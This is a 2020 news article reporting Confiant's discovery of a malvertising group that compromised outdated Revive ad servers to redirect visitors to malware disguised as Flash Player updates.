Posted on April 23, 2020 at 12:40 PM
Reports reveal that some hacker group has been inserting their malicious ads on ad servers for the past nine months. The malicious ads indirectly send users to the malware sites where the users’ systems are infected.
Confiant, a cybersecurity firm discovered the ads hacking campaign last month, although the malware campaign has been running since August last year.
How the hackers operate using malicious ads
Confiant reported that the cybercriminals infiltrated advertising servers that run outdated versions of the Revive open source ad server. The hackers infiltrated the old servers and quietly appended malicious codes to current running ads. As a result, the users clicking the ads would think they are clicking a genuine and secure add, only to be redirected to a malware server without their notice
After the hackers have succeeded in loading the malicious ads on the legitimate sites, the code steals and redirects the visitors to sites that provide malware-infested files. The user may not easily realize that files are malware-laced because they are disguised as Adobe Flash Player updates.
Confiant revealed that it has discovered about 60 Revive ad servers have been infiltrated with the malicious ads.
The cybersecurity firm said the hacking group, codenamed Tag Barnake, has succeeded in loading its malicious ads on several thousands of adverts. Also, the spreading rates of malicious ads have been enhanced through real-time bidding (RTB) assimilations between ad services.
According to Confiant’s Senior Security Engineer, Eliya Stein, only one infected RTB servers could raise the level of an affected ad impression to 1.25 million per day.
“If we take a look at the volumes behind just one of the compromised RTB ad servers – we see spikes of up to 1.25 [million] affected ad impressions in a single day,” he said.
Stein further pointed out that Tag Barmakke is not a popular malwertiser version. The hacking groups using malvertising approach to hack systems and networks have not operated on this level for a long time The last time a group was as sophisticated and smart as this was in 2016
Malvertiser groups are taking an entirely different approach
For the past years, many of the malvertising syndicates have used a different operational strategy by setting up networks of phony companies that purchase ads on genuine sites. After buying the legitimate ads, they usually modify the ads and load malicious codes.
This old strategy has been used by hackers using ads to perpetuate their hacking activities for the past few years. Some shady ad networks can even afford to overlook the activities of some of these malvertisers purchasing ads on their network since both parties benefit from the deal.
But this new strategy completely overruns the ad company and takes charge of its servers to distribute malware via a malicious ad campaign.
Stein said this new method is not very popular and not the easiest way to infiltrate systems through madvertisers. But it’s the most effective because the hacker will have full control over the ad channel, while still disguising as a legitimate ad server. However, once an ad server has been compromised, it would be counted that the hackers have violated the laws.
The new malvertising method also has a different focus, because not all malvertisers have the ability and skills set to go all out to attack an ad serving system. So they chose to pay for an ad slot, which seems a bit easier than expertly dismantling an ad server.
Attacks still going on
Stein and the Confiant security firm have been informing advertising companies about the current ad server hacking going on. But some of the advertisers have not responded with safe and secure measures to avoid being victims. As a result, the ad hacking group is still attacking some of these advert companies.
According to Stein, despite his notifications, some ad servers are still compromised, which allows the ad hackers to continue their hacking spree.